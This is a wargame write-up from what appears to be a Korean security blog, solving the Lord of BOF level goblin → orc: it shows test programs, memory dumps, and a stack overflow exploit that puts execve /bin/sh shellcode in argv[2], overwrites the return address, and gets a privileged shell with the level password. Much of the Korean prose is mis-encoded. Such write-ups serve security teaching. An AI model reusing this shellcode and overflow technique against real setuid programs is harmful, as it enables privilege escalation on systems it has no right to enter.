Security Mode

wargame ๐Ÿด‍โ˜ ๏ธ write-up/Lord of BOF

4. goblin → orc

Kortsec1 2018. 7. 26. 16:15

์•ˆ๋…•ํ•˜์„ธ์š” ์–ด๋Š๋ง 3๋ฒˆ๋ฌธ์ œ๊นŒ์ง€ ํด๋ฆฌ์–ดํ–ˆ๋„ค์š”ใ…Ž


์ €ํฌ๋Š” ํฌ๊ฒŒ 3๊ฐ€์ง€ ๋ฐฉ๋ฒ•์œผ๋กœ bof๊ณต๊ฒฉ์„ ํ•ด๋ณด์•˜์Šต๋‹ˆ๋‹ค.




3๊ฐ€์ง€๋กœ ๋‚˜๋ˆ„๋Š” ๊ธฐ์ค€์€ 'ret๋ฅผ ์–ด๋Š ์ฃผ์†Œ๋กœ ๋ฎ๋Š๋ƒ'์˜€๋Š”๋ฐ์š”,


1. buffer ๋ณ€์ˆ˜

2. argv[1]

3. ํ™˜๊ฒฝ๋ณ€์ˆ˜

์˜€์ฃ 







์—ฌ๊ธฐ๊นŒ์ง€ ์ž˜ ํ‘ธ์…จ๋‹ค๋ฉด ์•„๋งˆ ret๋ฅผ ๋ฎ์„ ์ฃผ์†Œ๋ฅผ ์ฐพ๋Š” ๊ฒƒ ์ฏค์€ ์‹์€์ฃฝ ๋จน๊ธฐ ์ผ ๊ฒ๋‹ˆ๋‹ค.

(๊ทธ๋ž˜๋„ ๋‹ค์‹œ ์ •๋ฆฌ๋ฅผ ์œ„ํ•ดใ…Ž) ์ œ๊ฐ€ ์œ ์šฉํ•˜๊ฒŒ ์‚ฌ์šฉํ•˜๋Š” ๋ฐฉ๋ฒ•์€ ํฌ๊ฒŒ ๋‘ ๊ฐ€์ง€์ธ๋ฐ์š”,




๋จผ์ € gdb๋ฅผ ํ†ตํ•ด ๋œฏ์–ด๋ณด๋ฉด์„œ ๋ฉ”๋ชจ๋ฆฌ๋ฅผ ๋ถ„์„ํ•˜๋Š” ๋ฐฉ๋ฒ•์ž…๋‹ˆ๋‹ค.

gdb๋ฅผ ์ด์šฉํ•œ๋‹ค๋Š” ๊ฒƒ ์ž์ฒด๊ฐ€ ๋ฉ”๋ชจ๋ฆฌ, ์–ด์…ˆ๋ธ”๋ฆฌ์–ด ๋“ฑ์˜ ๊ฐœ๋…๋“ค์„ ๊ณต๋ถ€ํ•˜๋Š”๋ฐ์— ๋งŽ์€ ๋„์›€์ด ๋ฉ๋‹ˆ๋‹ค.

๋˜ํ•œ, ๋ฌธ์ œ๋ฅผ ์ดํ•ดํ•˜๋Š”๋ฐ ํฐ ํž˜์ด ๋˜์ฃผ์ฃ !!







๋‘๋ฒˆ์งธ๋Š” ์ง์ ‘ ์ฝ”๋“œ๋ฅผ ์งœ์„œ ํ•ด๋ณด๋Š” ๊ฒƒ ์ž…๋‹ˆ๋‹ค.

์ œ๊ฐ€ ์•ž์œผ๋กœ ๋ฌธ์ œํ’€์ด์—์„œ ๋งŽ์ด ์‚ฌ์šฉํ•  ๋ฐฉ๋ฒ•์ด๊ธฐ๋„ ํ•˜๊ตฌ์š”ใ…Ž

gate๋ฅผ ๊ฐ€์ง€๊ณ  ์˜ˆ์‹œ๋ฅผ ๋ช‡๊ฐœ ๋“ค์–ด๋ณด๋„๋ก ํ•˜์ฃ 


[gate@localhost gate]$ cat -n test.c
     1	/*
     2		The Lord of the BOF : The Fellowship of the BOF 
     3		- gremlin
     4		- simple BOF
     5	*/
     6	 
     7	int main(int argc, char *argv[])
     8	{
     9	    char buffer[256];
    10	    if(argc < 2){
    11	        printf("argv error\n");
    12	        exit(0);
    13	    }
    14	    strcpy(buffer, argv[1]);
    15	    printf("%s\n", buffer);
    16	    printf("%p\n", buffer);
    17	}

๊ธฐ์กด gremlin.c์™€ ๋‹ค๋ฅธ์ ์€ 16๋ฒˆ์งธ ์ค„์ด ์ถ”๊ฐ€๋ฌ๋‹ค๋Š” ๊ฑด๋ฐ์š”, buffer์˜ ์ฃผ์†Œ๋ฅผ ์ฐพ๊ธฐ ์œ„ํ•ด %p๋กœ ์ถœ๋ ฅ์„ ํ•ด์ฃผ๋Š” ์ฝ”๋“œ ์ž…๋‹ˆ๋‹ค.



[gate@localhost gate]$ ./test `python -c 'print "\x90"*200 + "\x31\xc0\x50\x68\x2f
\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "A"*36
 +"\xbf\xbf\xbf\xbf"'`
1๓ฟฟh//shh/binโ“แ™ฐ
              อ€AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAยฟยฟยฟยฟ
0xbffff918
Segmentation fault (core dumped)
[gate@localhost gate]$ ./gremlin `python -c 'print "\x90"*200 + "\x31\xc0\x50\x68\x2f\x2f
\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "A"*36 +
"\x18\xf9\xff\xbf"'`
1๓ฟฟh//shh/binโ“แ™ฐ
              อ€AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
bash$ id
uid=500(gate) gid=500(gate) euid=501(gremlin) egid=501(gremlin) groups=500(gate)
bash$ my-pass
euid = 501
hello bof world
bash$

ret๋ฅผ test๋ฅผ ์‹คํ–‰ํ•˜์—ฌ ๋‚˜์˜จ ์ฃผ์†Œ๋กœ ๋ฎ์—ˆ๋”๋‹ˆ ์„ฑ๊ณต์ ์œผ๋กœ ์‹คํ–‰์ด ๋˜์ฃ ?






๋‘๋ฒˆ ์งธ๋Š”, dumpcode๋ผ๋Š” ํ—ค๋”ํŒŒ์ผ์„ ์ด์šฉํ•˜๋Š” ๋ฒ• ์ž…๋‹ˆ๋‹ค.


[gate@localhost gate]$ cat -n test.c
     1	#include "dumpcode.h"
     2	
     3	/*
     4		The Lord of the BOF : The Fellowship of the BOF 
     5		- gremlin
     6		- simple BOF
     7	*/
     8	 
     9	int main(int argc, char *argv[])
    10	{
    11	    char buffer[256];
    12	    if(argc < 2){
    13	        printf("argv error\n");
    14	        exit(0);
    15	    }
    16	    strcpy(buffer, argv[1]);
    17	    printf("%s\n", buffer);
    18	    dumpcode(buffer, 300);
    19	}

์ด๋ฒˆ์—๋Š” 1๋ฒˆ๊ณผ 18๋ฒˆ ์ค„์ด ์ถ”๊ฐ€๋ฌ์Šต๋‹ˆ๋‹ค.



[gate@localhost gate]$ ./test `python -c 'print "\x90"*200 + "\x31\xc0\x50\x68\x2f
\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "A"*36 +
 "\xbf\xbf\xbf\xbf"'`
1๓ฟฟh//shh/binโ“แ™ฐ
              อ€AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAยฟยฟยฟยฟ
0xbffff918  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff928  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff938  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff948  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff958  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff968  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff978  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff988  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff998  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9a8  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9b8  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9c8  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9d8  90 90 90 90 90 90 90 90 31 c0 50 68 2f 2f 73 68   ........1.Ph//sh
0xbffff9e8  68 2f 62 69 6e 89 e3 50 53 89 e1 99 b0 0b cd 80   h/bin..PS.......
0xbffff9f8  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
0xbffffa08  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
0xbffffa18  41 41 41 41 bf bf bf bf 00 00 00 00 64 fa ff bf   AAAA........d...
0xbffffa28  70 fa ff bf 68 38 01 40 02 00 00 00 c0 83 04 08   p...h8.@........
0xbffffa38  00 00 00 00 e1 83 04 08 54 86 04 08               ........T...
Segmentation fault (core dumped)

๋งˆ์น˜ gdb๋กœ ๋ฉ”๋ชจ๋ฆฌ ๋ถ„์„์„ ํ•˜๋“ฏ ๋ณด๊ธฐ ์‰ฝ๊ฒŒ ์ถœ๋ ฅํ•ด ์ค๋‹ˆ๋‹ค!!


dumpcodeํ—ค๋”๋Š” ์ด๋ ‡๊ฒŒ ์œ ์šฉํ•˜๊ฒŒ ๋งŽ์ด ์“ฐ์ด๋‹ˆ, ๊ธฐ์–ตํ•ด ๋‘ก์‹œ๋‹ค!






์ด์ œ ๋ณธ๊ฒฉ์ ์œผ๋กœ 4. goblin => orc๋ฅผ ํ’€์–ด ๋ณผ๊นŒ์š”?


id : goblin

pw : hackers proof


์†Œ์Šค ์ฝ”๋“œ๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์Šต๋‹ˆ๋‹ค.

[goblin@localhost goblin]$ cat -n orc.c
     1	/*
     2	        The Lord of the BOF : The Fellowship of the BOF
     3	        - orc
     4	        - egghunter
     5	*/
     6	
     7	#include 
     8	#include 
     9	
    10	extern char **environ;
    11	
    12	main(int argc, char *argv[])
    13	{
    14		char buffer[40];
    15		int i;
    16	
    17		if(argc < 2){
    18			printf("argv error\n");
    19			exit(0);
    20		}
    21	
    22		// egghunter 
    23		for(i=0; environ[i]; i++)
    24			memset(environ[i], 0, strlen(environ[i]));
    25	
    26		if(argv[1][47] != '\xbf')
    27		{
    28			printf("stack is still your friend.\n");
    29			exit(0);
    30		}
    31	
    32		strcpy(buffer, argv[1]); 
    33		printf("%s\n", buffer);
    34	}

22๋ฒˆ์งธ ~ 24๋ฒˆ์จฐ ์ค„์„ ๋ณด๋ฉด ํ™˜๊ฒฝ๋ณ€์ˆ˜๋ฅผ ์ดˆ๊ธฐํ™” ์‹œํ‚ค๋Š” ๊ฒƒ์„ ๋ณผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

buffer๋‚˜ argv[1]๋กœ jmpํ•  ์ˆ˜ ์žˆ๊ฒ ์ง€๋งŒ, ์ด๋ฒˆ์—๋Š” ์ข€ ๋‹ค๋ฅธ ๋ฐฉ๋ฒ•์„ ์‚ฌ์šฉํ•˜์—ฌ ํ’€๋„๋ก ํ•˜๊ฒ ์Šต๋‹ˆ๋‹ค.


argv[2]๋ฅผ ์ด์šฉํ•˜๋Š” ๋ฐฉ๋ฒ• ์ธ๋ฐ์š”, ์ •๋ง ๊ฐ„๋‹จํ•ฉ๋‹ˆ๋‹ค!!


argv[1]์—๋Š” ์‰˜์ฝ”๋“œ๊ฐ€ ๋“ค์–ด๊ฐˆ ํ•„์š”๊ฐ€ ์—†์œผ๋ฏ€๋กœ, buffer(40byte) + sfp(4byte) ์ด 44byte์˜ ์˜๋ฏธ์—†๋Š” ๊ฐ’์„ ์ฑ„์›Œ์ฃผ๊ณ ,

argv[2]์˜ ์ฃผ์†Œ๋ฅผ ret์— ๋ฎ์–ด์ฃผ๋ฉด ๋ฉ๋‹ˆ๋‹ค.


26๋ฒˆ์งธ ~ 30๋ฒˆ์งธ ์ค„์€ ret๋ฅผ ๋ฎ์„ ๋•Œ ์ž์—ฐ์Šค๋Ÿฝ๊ฒŒ ํŒจ์Šค ํ•˜๊ฒŒ ๋ฉ๋‹ˆ๋‹ค.(๋ ˆ๋“œํ–‡ ๋ฆฌ๋ˆ…์Šค ์Šคํ…์˜ ์ฃผ์†Ÿ๊ฐ’์€ ๋Œ€๋ถ€๋ถ„ \xbf๋กœ ์‹œ์ž‘ํ•˜์ฃ !)



argv[2]์˜ ์ฃผ์†Œ๋ฅผ ์ฐพ์•„๋‚ด๊ธฐ ์œ„ํ•ด dumpcode๋ฅผ ์ด์šฉํ•ด ๋ณด๋„๋ก ํ•ฉ์‹œ๋‹ค.



[goblin@localhost goblin]$ cat test.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - orc
        - egghunter
*/

#include <stdio.h>
#include <stdlib.h>
#include "dumpcode.h"

extern char **environ;

main(int argc, char *argv[])
{
	char buffer[40];
	int i;

	if(argc < 2){
		printf("argv error\n");
		exit(0);
	}

	// egghunter 
	for(i=0; environ[i]; i++)
		memset(environ[i], 0, strlen(environ[i]));

	if(argv[1][47] != '\xbf')
	{
		printf("stack is still your friend.\n");
		exit(0);
	}

	strcpy(buffer, argv[1]); 
	printf("%s\n", buffer);
	dumpcode(argv[2], 300);
}


python ์ฝ”๋“œ๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์ด argv[2]๋ฅผ ์ถ”๊ฐ€ํ•˜์—ฌ ์งœ์ค๋‹ˆ๋‹ค.


`python -c 'print "A"*44 + "\xbf\xbf\xbf\xbf" + " " + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`




argv[2]์˜ ๋ฉ”๋ชจ๋ฆฌ๊ฐ€ ์ž˜ ์ถœ๋ ฅ๋˜๋Š”๊ฑฐ ๋ณด์ด์‹œ์ฃ ..?


[goblin@localhost goblin]$ ./test `python -c 'print "A"*44 + "\xbf\xbf\xbf\xbf" + " " + "\x90"*100 +
 "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAยฟยฟยฟยฟ
0xbffffbe7  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffbf7  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffc07  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffc17  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffc27  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffc37  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffc47  90 90 90 90 31 c0 50 68 2f 2f 73 68 68 2f 62 69   ....1.Ph//shh/bi
0xbffffc57  6e 89 e3 50 53 89 e1 99 b0 0b cd 80 00 00 00 00   n..PS...........
0xbffffc67  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0xbffffc77  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0xbffffc87  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0xbffffc97  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0xbffffca7  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0xbffffcb7  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0xbffffcc7  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0xbffffcd7  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0xbffffce7  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0xbffffcf7  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0xbffffd07  00 00 00 00 00 00 00 00 00 00 00 00               ............
Segmentation fault (core dumped)




๊ทธ๋Ÿผ ์ด์ œ \xbf\xbf\xbf\xbf๋ถ€๋ถ„์„ 0xbfffc07๋กœ ๋ฎ๊ธฐ๋งŒ ํ•˜๋ฉด ๋๋‚˜๊ฒ ์ฃ ?


[goblin@localhost goblin]$ ./orc `python -c 'print "A"*44 + "\x07\xfc\xff\xbf" + " " + "\x90"*100 +
 "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
bash$ id
uid=503(goblin) gid=503(goblin) euid=504(orc) egid=504(orc) groups=503(goblin)
bash$ my-pass
euid = 504
cantata
bash$


์‰˜์ด ์„ฑ๊ณต์ ์œผ๋กœ ๋”ฐ์กŒ์Šต๋‹ˆ๋‹ค!!

'wargame ๐Ÿดโ€โ˜ ๏ธ write-up > Lord of BOF' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

6. wolfman โ†’ darkelf  (0) 2019.05.02
5. orc โ†’ wolfman  (0) 2019.05.02
3. cobolt โ†’ goblin  (0) 2018.07.25
2. gremlin โ†’ cobolt  (1) 2018.07.23

'wargame ๐Ÿด‍โ˜ ๏ธ write-up/Lord of BOF'์˜ ๋‹ค๋ฅธ๊ธ€

  • ํ˜„์žฌ๊ธ€4. goblin → orc

๊ด€๋ จ๊ธ€

ํ‹ฐ์Šคํ† ๋ฆฌํˆด๋ฐ”